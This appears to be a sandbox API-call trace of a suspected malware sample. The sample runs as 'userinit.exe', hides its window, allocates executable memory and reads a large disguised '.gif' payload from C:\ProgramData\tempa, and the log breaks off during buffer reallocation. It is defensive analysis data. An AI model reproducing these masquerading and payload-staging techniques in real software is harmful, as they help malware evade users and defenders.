[0158.165] LoadStringA (in: hInstance=0x400000, uID=0xff2a, lpBuffer=0x14f7dc, cchBufferMax=1024 | out: lpBuffer="Cream") returned 0x5
[0158.165] LoadStringA (in: hInstance=0x400000, uID=0xff29, lpBuffer=0x14f7dc, cchBufferMax=1024 | out: lpBuffer="Sky Blue") returned 0x8
[0158.165] LoadStringA (in: hInstance=0x400000, uID=0xff28, lpBuffer=0x14f7dc, cchBufferMax=1024 | out: lpBuffer="Money Green") returned 0xb
[0158.165] LoadStringA (in: hInstance=0x400000, uID=0xff27, lpBuffer=0x14f7dc, cchBufferMax=1024 | out: lpBuffer="White") returned 0x5
[0158.165] LoadStringA (in: hInstance=0x400000, uID=0xff26, lpBuffer=0x14f7dc, cchBufferMax=1024 | out: lpBuffer="Aqua") returned 0x4
[0158.165] LoadStringA (in: hInstance=0x400000, uID=0xff25, lpBuffer=0x14f7dc, cchBufferMax=1024 | out: lpBuffer="Fuchsia") returned 0x7
[0158.165] LoadStringA (in: hInstance=0x400000, uID=0xff24, lpBuffer=0x14f7dc, cchBufferMax=1024 | out: lpBuffer="Blue") returned 0x4
[0158.165] LoadStringA (in: hInstance=0x400000, uID=0xff23, lpBuffer=0x14f7dc, cchBufferMax=1024 | out: lpBuffer="Yellow") returned 0x6
[0158.165] LoadStringA (in: hInstance=0x400000, uID=0xff22, lpBuffer=0x14f7dc, cchBufferMax=1024 | out: lpBuffer="Lime") returned 0x4
[0158.165] LoadStringA (in: hInstance=0x400000, uID=0xff21, lpBuffer=0x14f7dc, cchBufferMax=1024 | out: lpBuffer="Red") returned 0x3
[0158.165] LoadStringA (in: hInstance=0x400000, uID=0xff20, lpBuffer=0x14f7dc, cchBufferMax=1024 | out: lpBuffer="Silver") returned 0x6
[0158.165] LoadStringA (in: hInstance=0x400000, uID=0xff3f, lpBuffer=0x14f7dc, cchBufferMax=1024 | out: lpBuffer="Gray") returned 0x4
[0158.165] LoadStringA (in: hInstance=0x400000, uID=0xff3e, lpBuffer=0x14f7dc, cchBufferMax=1024 | out: lpBuffer="Teal") returned 0x4
[0158.165] LoadStringA (in: hInstance=0x400000, uID=0xff3d, lpBuffer=0x14f7dc, cchBufferMax=1024 | out: lpBuffer="Purple") returned 0x6
[0158.165] LoadStringA (in: hInstance=0x400000, uID=0xff3c, lpBuffer=0x14f7dc, cchBufferMax=1024 | out: lpBuffer="Navy") returned 0x4
[0158.165] LoadStringA (in: hInstance=0x400000, uID=0xff3b, lpBuffer=0x14f7dc, cchBufferMax=1024 | out: lpBuffer="Olive") returned 0x5
[0158.165] LoadStringA (in: hInstance=0x400000, uID=0xff3a, lpBuffer=0x14f7dc, cchBufferMax=1024 | out: lpBuffer="Green") returned 0x5
[0158.165] LoadStringA (in: hInstance=0x400000, uID=0xff39, lpBuffer=0x14f7dc, cchBufferMax=1024 | out: lpBuffer="Maroon") returned 0x6
[0158.166] LoadStringA (in: hInstance=0x400000, uID=0xff38, lpBuffer=0x14f7dc, cchBufferMax=1024 | out: lpBuffer="Black") returned 0x5
[0158.166] RegisterClipboardFormatA (lpszFormat="Delphi Picture") returned 0xc157
[0158.166] RegisterClipboardFormatA (lpszFormat="Delphi Component") returned 0xc158
[0158.166] GetVersion () returned 0x1db10106
[0158.166] GetCurrentProcessId () returned 0x710
[0158.166] GlobalAddAtomA (lpString="Delphi00000710") returned 0xc116
[0158.166] GetCurrentThreadId () returned 0x6f8
[0158.166] GlobalAddAtomA (lpString="ControlOfs00400000000006F8") returned 0xc115
[0158.166] RegisterClipboardFormatA (lpszFormat="ControlOfs00400000000006F8") returned 0xc17b
[0158.166] GetProcAddress (hModule=0x757b0000, lpProcName="GetMonitorInfoA") returned 0x757bc34e
[0158.166] GetProcAddress (hModule=0x757b0000, lpProcName="GetSystemMetrics") returned 0x757c67cf
[0158.166] GetSystemMetrics (nIndex=19) returned 1
[0158.212] GetSystemMetrics (nIndex=75) returned 1
[0158.212] SystemParametersInfoA (in: uiAction=0x68, uiParam=0x0, pvParam=0x471310, fWinIni=0x0 | out: pvParam=0x471310) returned 1
[0158.212] LoadCursorA (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003
[0158.212] LoadCursorA (hInstance=0x0, lpCursorName=0x7f86) returned 0x10015
[0158.212] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ff9) returned 0xa01f9
[0158.212] LoadCursorA (hInstance=0x0, lpCursorName=0x7f8b) returned 0x1001b
[0158.212] LoadCursorA (hInstance=0x0, lpCursorName=0x7f8a) returned 0x10019
[0158.212] LoadCursorA (hInstance=0x0, lpCursorName=0x7f88) returned 0x10017
[0158.212] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ffa) returned 0x901b3
[0158.213] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ffb) returned 0x901b1
[0158.213] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ffc) returned 0x801af
[0158.213] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ffd) returned 0x901a9
[0158.213] LoadCursorA (hInstance=0x400000, lpCursorName=0x7fff) returned 0x3011b
[0158.213] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ffe) returned 0x160067
[0158.214] LoadCursorA (hInstance=0x0, lpCursorName=0x7f02) returned 0x10007
[0158.214] LoadCursorA (hInstance=0x0, lpCursorName=0x7f04) returned 0x1000b
[0158.214] LoadCursorA (hInstance=0x0, lpCursorName=0x7f84) returned 0x10011
[0158.214] LoadCursorA (hInstance=0x0, lpCursorName=0x7f82) returned 0x1000d
[0158.214] LoadCursorA (hInstance=0x0, lpCursorName=0x7f85) returned 0x10013
[0158.214] LoadCursorA (hInstance=0x0, lpCursorName=0x7f83) returned 0x1000f
[0158.214] LoadCursorA (hInstance=0x0, lpCursorName=0x7f86) returned 0x10015
[0158.214] LoadCursorA (hInstance=0x0, lpCursorName=0x7f01) returned 0x10005
[0158.214] LoadCursorA (hInstance=0x0, lpCursorName=0x7f03) returned 0x10009
[0158.214] LoadCursorA (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003
[0158.214] GetKeyboardLayout (idThread=0x0) returned 0x4090409
[0158.214] GetDC (hWnd=0x0) returned 0x4f010863
[0158.214] GetDeviceCaps (hdc=0x4f010863, index=90) returned 96
[0158.214] ReleaseDC (hWnd=0x0, hDC=0x4f010863) returned 1
[0158.214] GetProcAddress (hModule=0x757b0000, lpProcName="EnumDisplayMonitors") returned 0x757c34a3
[0158.214] EnumDisplayMonitors (hdc=0x0, lprcClip=0x0, lpfnEnum=0x444d6c, dwData=0x47155c) returned 1
[0158.214] SystemParametersInfoA (in: uiAction=0x1f, uiParam=0x3c, pvParam=0x14fb47, fWinIni=0x0 | out: pvParam=0x14fb47) returned 1
[0158.214] CreateFontIndirectA (lplf=0x14fb47) returned 0x4f0a0898
[0158.214] GetObjectA (in: h=0x4f0a0898, c=60, pv=0x14f938 | out: pv=0x14f938) returned 60
[0158.215] SystemParametersInfoA (in: uiAction=0x29, uiParam=0x0, pvParam=0x14f9f3, fWinIni=0x0 | out: pvParam=0x14f9f3) returned 1
[0158.215] CreateFontIndirectA (lplf=0x14facf) returned 0x720a0888
[0158.215] GetObjectA (in: h=0x720a0888, c=60, pv=0x14f938 | out: pv=0x14f938) returned 60
[0158.215] CreateFontIndirectA (lplf=0x14fa93) returned 0x230a089f
[0158.215] GetObjectA (in: h=0x230a089f, c=60, pv=0x14f938 | out: pv=0x14f938) returned 60
[0158.215] LoadIconA (hInstance=0x400000, lpIconName="MAINICON") returned 0x0
[0158.215] GetModuleFileNameA (in: hModule=0x400000, lpFilename=0x14faa7, nSize=0x100 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0158.215] OemToCharA (in: pSrc="C:\\Windows\\System32\\userinit.exe", pDst=0x14faa7 | out: pDst="C:\\Windows\\System32\\userinit.exe") returned 1
[0158.215] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x40) returned 0xd0000
[0158.215] GetClassInfoA (in: hInstance=0x400000, lpClassName="TApplication", lpWndClass=0x14fa5c | out: lpWndClass=0x14fa5c) returned 0
[0158.216] RegisterClassA (lpWndClass=0x451c88) returned 0x20c167
[0158.216] GetSystemMetrics (nIndex=0) returned 1440
[0158.216] GetSystemMetrics (nIndex=1) returned 900
[0158.216] CreateWindowExA (dwExStyle=0x0, lpClassName="TApplication", lpWindowName="userinit", dwStyle=0x84ca0000, X=720, Y=450, nWidth=0, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0x400000, lpParam=0x0) returned 0x901e2
[0158.219] SetWindowLongA (hWnd=0x901e2, nIndex=-4, dwNewLong=856047) returned 4219500
[0158.219] LoadIconA (hInstance=0x0, lpIconName=0x7f00) returned 0x10027
[0158.219] SendMessageA (hWnd=0x901e2, Msg=0x80, wParam=0x1, lParam=0x10027) returned 0x0
[0158.219] DefWindowProcA (hWnd=0x901e2, Msg=0x80, wParam=0x1, lParam=0x10027) returned 0x0
[0158.230] DefWindowProcA (hWnd=0x901e2, Msg=0x7f, wParam=0x2, lParam=0x0) returned 0xa01c7
[0158.231] LoadIconA (hInstance=0x0, lpIconName=0x7f00) returned 0x10027
[0158.231] SetClassLongA (hWnd=0x901e2, nIndex=-14, dwNewLong=65575) returned 0x0
[0158.232] GetSystemMenu (hWnd=0x901e2, bRevert=0) returned 0xd01cd
[0158.233] DeleteMenu (hMenu=0xd01cd, uPosition=0xf030, uFlags=0x0) returned 1
[0158.233] DeleteMenu (hMenu=0xd01cd, uPosition=0xf000, uFlags=0x0) returned 1
[0158.233] DeleteMenu (hMenu=0xd01cd, uPosition=0xf010, uFlags=0x0) returned 1
[0158.233] GetKeyboardLayoutList (in: nBuff=64, lpList=0x14fa28 | out: lpList=0x14fa28) returned 1
[0158.234] GetModuleHandleA (lpModuleName="USER32") returned 0x757b0000
[0158.234] GetProcAddress (hModule=0x757b0000, lpProcName="AnimateWindow") returned 0x757e0620
[0158.235] GetModuleHandleA (lpModuleName="comctl32.dll") returned 0x6d7b0000
[0158.235] GetProcAddress (hModule=0x6d7b0000, lpProcName="InitializeFlatSB") returned 0x6d7e266f
[0158.235] GetProcAddress (hModule=0x6d7b0000, lpProcName="UninitializeFlatSB") returned 0x6d7e2542
[0158.235] GetProcAddress (hModule=0x6d7b0000, lpProcName="FlatSB_GetScrollProp") returned 0x6d7e1d29
[0158.235] GetProcAddress (hModule=0x6d7b0000, lpProcName="FlatSB_SetScrollProp") returned 0x6d7e238d
[0158.235] GetProcAddress (hModule=0x6d7b0000, lpProcName="FlatSB_EnableScrollBar") returned 0x6d7e20c9
[0158.235] GetProcAddress (hModule=0x6d7b0000, lpProcName="FlatSB_ShowScrollBar") returned 0x6d7e1fdb
[0158.235] GetProcAddress (hModule=0x6d7b0000, lpProcName="FlatSB_GetScrollRange") returned 0x6d7e1e8d
[0158.236] GetProcAddress (hModule=0x6d7b0000, lpProcName="FlatSB_GetScrollInfo") returned 0x6d7e1f0f
[0158.236] GetProcAddress (hModule=0x6d7b0000, lpProcName="FlatSB_GetScrollPos") returned 0x6d7e1ccd
[0158.236] GetProcAddress (hModule=0x6d7b0000, lpProcName="FlatSB_SetScrollPos") returned 0x6d7e216d
[0158.236] GetProcAddress (hModule=0x6d7b0000, lpProcName="FlatSB_SetScrollInfo") returned 0x6d7e22be
[0158.236] GetProcAddress (hModule=0x6d7b0000, lpProcName="FlatSB_SetScrollRange") returned 0x6d7e21e2
[0158.236] GetModuleHandleA (lpModuleName="User32.dll") returned 0x757b0000
[0158.236] GetProcAddress (hModule=0x757b0000, lpProcName="SetLayeredWindowAttributes") returned 0x757ba6dc
[0158.236] RegisterClipboardFormatA (lpszFormat="TaskbarCreated") returned 0xc078
[0158.236] RegisterClipboardFormatA (lpszFormat="commdlg_help") returned 0xc0eb
[0158.236] RegisterClipboardFormatA (lpszFormat="commdlg_FindReplace") returned 0xc0fc
[0158.236] GetCurrentThreadId () returned 0x6f8
[0158.236] GlobalAddAtomA (lpString="WndProcPtr00400000000006F8") returned 0xc114
[0158.236] VirtualAlloc (lpAddress=0x474000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x474000
[0158.237] ShowWindow (hWnd=0x901e2, nCmdShow=0) returned 0
[0158.237] FindWindowA (lpClassName=0x0, lpWindowName="marxvxinhhm0131") returned 0x0
[0158.237] CreateFileA (lpFileName="C:\\ProgramData\\tempa\\marxvxinhhmg.gif" (normalized: "c:\\programdata\\tempa\\marxvxinhhmg.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x98
[0158.237] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0x14f7a8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x14f7a8*=0) returned 0x0
[0158.237] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0x14f7a0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x14f7a0*=0) returned 0x0
[0158.237] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0x14f7a0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x14f7a0*=0) returned 0x10be00
[0158.237] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0x14f7a0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x14f7a0*=0) returned 0x0
[0158.238] GlobalLock (hMem=0x840004) returned 0x22c0020
[0158.238] ReadFile (in: hFile=0x98, lpBuffer=0x22c0020, nNumberOfBytesToRead=0x10be00, lpNumberOfBytesRead=0x14f7bc, lpOverlapped=0x0 | out: lpBuffer=0x22c0020*, lpNumberOfBytesRead=0x14f7bc*=0x10be00, lpOverlapped=0x0) returned 1
[0158.301] CloseHandle (hObject=0x98) returned 1
[0158.301] GlobalLock (hMem=0x84000c) returned 0x676810
[0158.302] GlobalHandle (pMem=0x676810) returned 0x84000c
[0158.302] GlobalUnlock (hMem=0x84000c) returned 0
[0158.302] GlobalReAlloc (hMem=0x84000c, dwBytes=0x4000, uFlags=0x2) returned 0x84000c
[0158.302] GlobalLock (hMem=0x84000c) returned 0x676810
[0158.303] GlobalHandle (pMem=0x676810) returned 0x84000c
[0158.303] GlobalUnlock (hMem=0x84000c) returned 0
[0158.303] GlobalReAlloc (hMem=0x84000c, dwBytes=0x6000, uFlags=0x2) returned 0x84000c
[0158.304] GlobalLock (hMem=0x84000c) returned 0x67a820
[0158.304] GlobalHandle (pMem=0x67a820) returned 0x84000c
[0158.305] GlobalUnlock (hMem=0x84000c) returned 0
[0158.305] GlobalReAlloc (hMem=0x84000c, dwBytes=0x8000, uFlags=0x2) returned 0x84000c
[0158.305] GlobalLock (hMem=0x84000c) returned 0x680830
[0158.306] GlobalHandle (pMem=0x680830) returned 0x84000c
[0158.306] GlobalUnlock (hMem=0x84000c) returned 0
[0158.306] GlobalReAlloc (hMem=0x84000c, dwBytes=0xa000, uFlags=0x2) returned 0x84000c
[0158.306] GlobalLock (hMem=0x84000c) returned 0x680830
[0158.307] GlobalHandle (pMem=0x680830) returned 0x84000c
[0158.307] GlobalUnlock (hMem=0x84000c) returned 0
[0158.307] GlobalReAlloc (hMem=0x84000c, dwBytes=0xc000, uFlags=0x2) returned 0x84000c
[0158.307] GlobalLock (hMem=0x84000c) returned 0x68a840
[0158.308] GlobalHandle (pMem=0x68a840) returned 0x84000c
[0158.308] GlobalUnlock (hMem=0x84000c) returned 0
[0158.308] GlobalReAlloc (hMem=0x84000c, dwBytes=0xe000, uFlags=0x2) returned 0x84000c
[0158.308] GlobalLock (hMem=0x84000c) returned 0x676810
[0158.309] GlobalHandle (pMem=0x676810) returned 0x84000c
[0158.309] GlobalUnlock (hMem=0x84000c) returned 0
[0158.309] GlobalReAlloc (hMem=0x84000c, dwBytes=0x10000, uFlags=0x2) returned 0x84000c
[0158.309] GlobalLock (hMem=0x84000c) returned 0x676810
[0158.309] GlobalHandle (pMem=0x676810) returned 0x84000c
[0158.309] GlobalUnlock (hMem=0x84000c) returned 0
[0158.309] GlobalReAlloc (hMem=0x84000c, dwBytes=0x12000, uFlags=0x2) returned 0x84000c
[0158.309] GlobalLock (hMem=0x84000c) returned 0x676810
[0158.310] GlobalHandle (pMem=0x676810) returned 0x84000c
[0158.310] GlobalUnlock (hMem=0x84000c) returned 0
[0158.310] GlobalReAlloc (hMem=0x84000c, dwBytes=0x14000, uFlags=0x2) returned 0x84000c
[0158.310] GlobalLock (hMem=0x84000c) returned 0x676810
[0158.311] GlobalHandle (pMem=0x676810) returned 0x84000c
[0158.311] GlobalUnlock (hMem=0x84000c) returned 0
[0158.311] GlobalReAlloc (hMem=0x84000c, dwBytes=0x16000, uFlags=0x2) returned 0x84000c
[0158.311] GlobalLock (hMem=0x84000c) returned 0x676810
[0158.312] GlobalHandle (pMem=0x676810) returned 0x84000c
[0158.312] GlobalUnlock (hMem=0x84000c) returned 0
[0158.312] GlobalReAlloc (hMem=0x84000c, dwBytes=0x18000, uFlags=0x2) returned 0x84000c
[0158.312] GlobalLock (hMem=0x84000c) returned 0x676810
[0158.312] GlobalHandle (pMem=0x676810) returned 0x84000c
[0158.312] GlobalUnlock (hMem=0x84000c) returned 0
[0158.312] GlobalReAlloc (hMem=0x84000c, dwBytes=0x1a000, uFlags=0x2) returned 0x84000c
[0158.313] GlobalLock (hMem=0x84000c) returned 0x676810
[0158.313] GlobalHandle (pMem=0x676810) returned 0x84000c
[0158.313] GlobalUnlock (hMem=0x84000c) returned 0
[0158.313] GlobalReAlloc (hMem=0x84000c, dwBytes=0x1c000, uFlags=0x2) returned 0x84000c
[0158.313] GlobalLock (hMem=0x84000c) returned 0x676810
[0158.314] GlobalHandle (pMem=0x676810) returned 0x84000c
[0158.314] GlobalUnlock (hMem=0x84000c) returned 0
[0158.314] GlobalReAlloc (hMem=0x84000c, dwBytes=0x1e000, uFlags=0x2) returned 0x84000c
[0158.314] GlobalLock (hMem=0x84000c) returned 0x676810
[0158.315] GlobalHandle (pMem=0x676810) returned 0x84000c
[0158.315] GlobalUnlock (hMem=0x84000c) returned 0
[0158.315] GlobalReAlloc (hMem=0x84000c, dwBytes=0x20000, uFlags=0x2) returned 0x84000c
[0158.315] GlobalLock (hMem=0x84000c) returned 0x676810
[0158.315] GlobalHandle (pMem=0x676810) returned 0x84000c
[0158.315] GlobalUnlock (hMem=0x84000c) returned 0
[0158.315] GlobalReAlloc (hMem=0x84000c, dwBytes=0x22000, uFlags=0x2) returned 0x84000c
[0158.317] GlobalLock (hMem=0x84000c) returned 0x696820
[0158.318] GlobalHandle (pMem=0x696820) returned 0x84000c
[0158.318] GlobalUnlock (hMem=0x84000c) returned 0
[0158.319] GlobalReAlloc (hMem=0x84000c, dwBytes=0x24000, uFlags=0x2) returned 0x84000c
[0158.319] GlobalLock (hMem=0x84000c) returned 0x696820
[0158.319] GlobalHandle (pMem=0x696820) returned 0x84000c
[0158.319] GlobalUnlock (hMem=0x84000c) returned 0
[0158.319] GlobalReAlloc (hMem=0x84000c, dwBytes=0x26000, uFlags=0x2) returned 0x84000c
[0158.321] GlobalLock (hMem=0x84000c) returned 0x6ba830
[0158.321] GlobalHandle (pMem=0x6ba830) returned 0x84000c
[0158.322] GlobalUnlock (hMem=0x84000c) returned 0
[0158.322] GlobalReAlloc (hMem=0x84000c, dwBytes=0x28000, uFlags=0x2) returned 0x84000c
[0158.322] GlobalLock (hMem=0x84000c) returned 0x676810
[0158.322] GlobalHandle (pMem=0x676810) returned 0x84000c
[0158.322] GlobalUnlock (hMem=0x84000c) returned 0
[0158.322] GlobalReAlloc (hMem=0x84000c, dwBytes=0x2a000, uFlags=0x2) returned 0x84000c
[0158.322] GlobalLock (hMem=0x84000c) returned 0x676810
[0158.323] GlobalHandle (pMem=0x676810) returned 0x84000c
[0158.323] GlobalUnlock (hMem=0x84000c) returned 0
[0158.323] GlobalReAlloc (hMem=0x84000c, dwBytes=0x2c000, uFlags=0x2) returned 0x84000c
[0158.323] GlobalLock (hMem=0x84000c) returned 0x676810
[0158.324] GlobalHandle (pMem=0x676810) returned 0x84000c
[0158.324] GlobalUnlock (hMem=0x84000c) returned 0
[0158.324] GlobalReAlloc (hMem=0x84000c, dwBytes=0x2e000, uFlags=0x2) returned 0x84000c
[0158.324] GlobalLock (hMem=0x84000c) returned 0x676810
[0158.325] GlobalHandle (pMem=0x676810) returned 0x84000c
[0158.325] GlobalUnlock (hMem=0x84000c) returned 0
[0158.325] GlobalReAlloc (hMem=0x84000c, dwBytes=0x30000, uFlags=0x2) returned 0x84000c
[0158.325] GlobalLock (hMem=0x84000c) returned 0x676810
[0158.326] GlobalHandle (pMem=0x676810) returned 0x84000c
[0158.326] GlobalUnlock (hMem=0x84000c) returned 0
[0158.326] GlobalReAlloc (hMem=0x84000c, dwBytes=0x32000, uFlags=0x2) returned 0x84000c
[0158.326] GlobalLock (hMem=0x84000c) returned 0x676810
[0158.326] GlobalHandle (pMem=0x676810) returned 0x84000c
[0158.326] GlobalUnlock (hMem=0x84000c) returned 0
[0158.326] GlobalReAlloc (hMem=0x84000c, dwBytes=0x34000, uFlags=0x2) returned 0x84000c
[0158.326] GlobalLock (hMem=0x84000c) returned 0x676810
[0158.327] GlobalHandle (pMem=0x676810) returned 0x84000c
[0158.327] GlobalUnlock (hMem=0x84000c) returned 0
[0158.327] GlobalReAlloc (hMem=0x84000c, dwBytes=0x36000, uFlags=0x2) returned 0x84000c
[0158.327] GlobalLock (hMem=0x84000c) returned 0x676810
[0158.328] GlobalHandle (pMem=0x676810) returned 0x84000c
[0158.328] GlobalUnlock (hMem=0x84000c) returned 0
[0158.328] GlobalReAlloc (hMem=0x84000c, dwBytes=0x38000, uFlags=0x2) returned 0x84000c
[0158.328] GlobalLock (hMem=0x84000c) returned 0x676810
[0158.329] GlobalHandle (pMem=0x676810) returned 0x84000c
[0158.329] GlobalUnlock (hMem=0x84000c) returned 0
[0158.329] GlobalReAlloc (hMem=0x84000c, dwBytes=0x3a000, uFlags=0x2) returned 0x84000c
[0158.329] GlobalLock (hMem=0x84000c) returned 0x676810
[0158.330] GlobalHandle (pMem=0x676810) returned 0x84000c
[0158.330] GlobalUnlock (hMem=0x84000c) returned 0
[0158.330] GlobalReAlloc (hMem=0x84000c, dwBytes=0x3c000, uFlags=0x2) returned 0x84000c
[0158.330] GlobalLock (hMem=0x84000c) returned 0x676810
[0158.330] GlobalHandle (pMem=0x676810) returned 0x84000c
[0158.330] GlobalUnlock (hMem=0x84000c) returned 0
[0158.330] GlobalReAlloc (hMem=0x84000c, dwBytes=0x3e000, uFlags=0x2) returned 0x84000c
[0158.330] GlobalLock (hMem=0x84000c) returned 0x676810
[0158.331] GlobalHandle (pMem=0x676810) returned 0x84000c
[0158.331] GlobalUnlock (hMem=0x84000c) returned 0
[0158.331] GlobalReAlloc (hMem=0x84000c, dwBytes=0x40000, uFlags=0x2) returned 0x84000c
[0158.331] GlobalLock (hMem=0x84000c) returned 0x676810
[0158.332] GlobalHandle (pMem=0x676810) returned 0x84000c
[0158.332] GlobalUnlock (hMem=0x84000c) returned 0
[0158.332] GlobalReAlloc (hMem=0x84000c, dwBytes=0x42000, uFlags=0x2) returned 0x84000c
[0158.332] GlobalLock (hMem=0x84000c) returned 0x676810
[0158.333] GlobalHandle (pMem=0x676810) returned 0x84000c
[0158.333] GlobalUnlock (hMem=0x84000c) returned 0
[0158.333] GlobalReAlloc (hMem=0x84000c, dwBytes=0x44000, uFlags=0x2) returned 0x84000c
[0158.333] GlobalLock (hMem=0x84000c) returned 0x676810
[0158.381] GlobalHandle (pMem=0x676810) returned 0x84000c
[0158.381] GlobalUnlock (hMem=0x84000c) returned 0
[0158.381] GlobalReAlloc (hMem=0x84000c, dwBytes=0x46000, uFlags=0x2) returned 0x84000c
[0158.381] GlobalLock (hMem=0x84000c) returned 0x676810
[0158.382] GlobalHandle (pMem=0x676810) returned 0x84000c
[0158.382] GlobalUnlock (hMem=0x84000c) returned 0
[0158.382] GlobalReAlloc (hMem=0x84000c, dwBytes=0x48000, uFlags=0x2) returned 0x84000c
[0158.382] GlobalLock (hMem=0x84000c) returned 0x676810
[0158.383] GlobalHandle (pMem=0x676810) returned 0x84000c
[0158.383] GlobalUnlock (hMem=0x84000c) returned 0
[0158.383] GlobalReAlloc (hMem=0x84000c, dwBytes=0x4a000, uFlags=0x2) returned 0x84000c
[0158.383] GlobalLock (hMem=0x84000c) returned 0x676810
[0158.383] GlobalHandle (pMem=0x676810) returned 0x84000c
[0158.383] GlobalUnlock (hMem=0x84000c) returned 0
[0158.383] GlobalReAlloc (hMem=0x84000c, dwBytes=0x4c000, uFlags=0x2) returned 0x84000c
[0158.383] GlobalLock (hMem=0x84000c) returned 0x676810
[0158.384] GlobalHandle (pMem=0x676810) returned 0x84000c
[0158.384] GlobalUnlock (hMem=0x84000c) returned 0
[0158.384] GlobalReAlloc (hMem=0x84000c, dwBytes=0x4e000, uFlags=0x2) returned 0x84000c
[0158.384] GlobalLock (hMem=0x84000c) returned 0x676810
[0158.385] GlobalHandle (pMem=0x676810) returned 0x84000c
[0158.385] GlobalUnlock (hMem=0x84000c) returned 0
[0158.385] GlobalReAlloc (hMem=0x84000c, dwBytes=0x50000, uFlags=0x2) returned 0x84000c
[0158.385] GlobalLock (hMem=0x84000c) returned 0x676810
[0158.386] GlobalHandle (pMem=0x676810) returned 0x84000c
[0158.386] GlobalUnlock (hMem=0x84000c) returned 0
[0158.386] GlobalReAlloc (hMem=0x84000c, dwBytes=0x52000, uFlags=0x2) returned 0x84000c
[0158.386] GlobalLock (hMem=0x84000c) returned 0x676810
[0158.387] GlobalHandle (pMem=0x676810) returned 0x84000c
[0158.387] GlobalUnlock (hMem=0x84000c) returned 0
[0158.387] GlobalReAlloc (hMem=0x84000c, dwBytes=0x54000, uFlags=0x2) returned 0x84000c
[0158.387] GlobalLock (hMem=0x84000c) returned 0x676810
[0158.388] GlobalHandle (pMem=0x676810) returned 0x84000c
[0158.388] GlobalUnlock (hMem=0x84000c) returned 0
[0158.388] GlobalReAlloc (hMem=0x84000c, dwBytes=0x56000, uFlags=0x2) returned 0x84000c
[0158.388] GlobalLock (hMem=0x84000c) returned 0x676810
[0158.389] GlobalHandle (pMem=0x676810) returned 0x84000c
[0158.389] GlobalUnlock (hMem=0x84000c) returned 0
[0158.389] GlobalReAlloc (hMem=0x84000c, dwBytes=0x58000, uFlags=0x2) returned 0x84000c
[0158.389] GlobalLock (hMem=0x84000c) returned 0x676810
[0158.390] GlobalHandle (pMem=0x676810) returned 0x84000c
[0158.390] GlobalUnlock (hMem=0x84000c) returned 0
[0158.390] GlobalReAlloc (hMem=0x84000c, dwBytes=0x5a000, uFlags=0x2) returned 0x84000c
[0158.390] GlobalLock (hMem=0x84000c) returned 0x676810
[0158.391] GlobalHandle (pMem=0x676810) returned 0x84000c
[0158.391] GlobalUnlock (hMem=0x84000c) returned 0
[0158.391] GlobalReAlloc (hMem=0x84000c, dwBytes=0x5c000, uFlags=0x2) returned 0x84000c
[0158.391] GlobalLock (hMem=0x84000c) returned 0x676810
[0158.392] GlobalHandle (pMem=0x676810) returned 0x84000c
[0158.392] GlobalUnlock (hMem=0x84000c) returned 0
[0158.392] GlobalReAlloc (hMem=0x84000c, dwBytes=0x5e000, uFlags=0x2) returned 0x84000c
[0158.392] GlobalLock (hMem=0x84000c) returned 0x676810
[0158.392] GlobalHandle (pMem=0x676810) returned 0x84000c
[0158.393] GlobalUnlock (hMem=0x84000c) returned 0
[0158.393] GlobalReAlloc (hMem=0x84000c, dwBytes=0x60000, uFlags=0x2) returned 0x84000c
[0158.393] GlobalLock (hMem=0x84000c) returned 0x676810
[0158.393] GlobalHandle (pMem=0x676810) returned 0x84000c
[0158.393] GlobalUnlock (hMem=0x84000c) returned 0
[0158.393] GlobalReAlloc (hMem=0x84000c, dwBytes=0x62000, uFlags=0x2) returned 0x84000c
[0158.393] GlobalLock (hMem=0x84000c) returned 0x676810
[0158.394] GlobalHandle (pMem=0x676810) returned 0x84000c
[0158.394] GlobalUnlock (hMem=0x84000c) returned 0
[0158.394] GlobalReAlloc (hMem=0x84000c, dwBytes=0x64000, uFlags=0x2) returned 0x84000c
[0158.394] GlobalLock (hMem=0x84000c) returned 0x676810
[0158.395] GlobalHandle (pMem=0x676810) returned 0x84000c
[0158.395] GlobalUnlock (hMem=0x84000c) returned 0
[0158.395] GlobalReAlloc (hMem=0x84000c, dwBytes=0x66000, uFlags=0x2) returned 0x84000c
[0158.395] GlobalLock (hMem=0x84000c) returned 0x676810
[0158.396] GlobalHandle (pMem=0x676810) returned 0x84000c
[0158.396] GlobalUnlock (hMem=0x84000c) returned 0
[0158.396] GlobalReAlloc (hMem=0x84000c, dwBytes=0x68000, uFlags=0x2) returned 0x84000c
[0158.396] GlobalLock (hMem=0x84000c) returned 0x676810
[0158.397] GlobalHandle (pMem=0x676810) returned 0x84000c
[0158.397] GlobalUnlock (hMem=0x84000c) returned 0
[0158.397] GlobalReAlloc (hMem=0x84000c, dwBytes=0x6a000, uFlags=0x2) returned 0x84000c
[0158.397] GlobalLock (hMem=0x84000c) returned 0x676810
[0158.398] GlobalHandle (pMem=0x676810) returned 0x84000c
[0158.398] GlobalUnlock (hMem=0x84000c) returned 0
[0158.398] GlobalReAlloc (hMem=0x84000c, dwBytes=0x6c000, uFlags=0x2) returned 0x84000c
[0158.402] GlobalLock (hMem=0x84000c) returned 0x6e0820
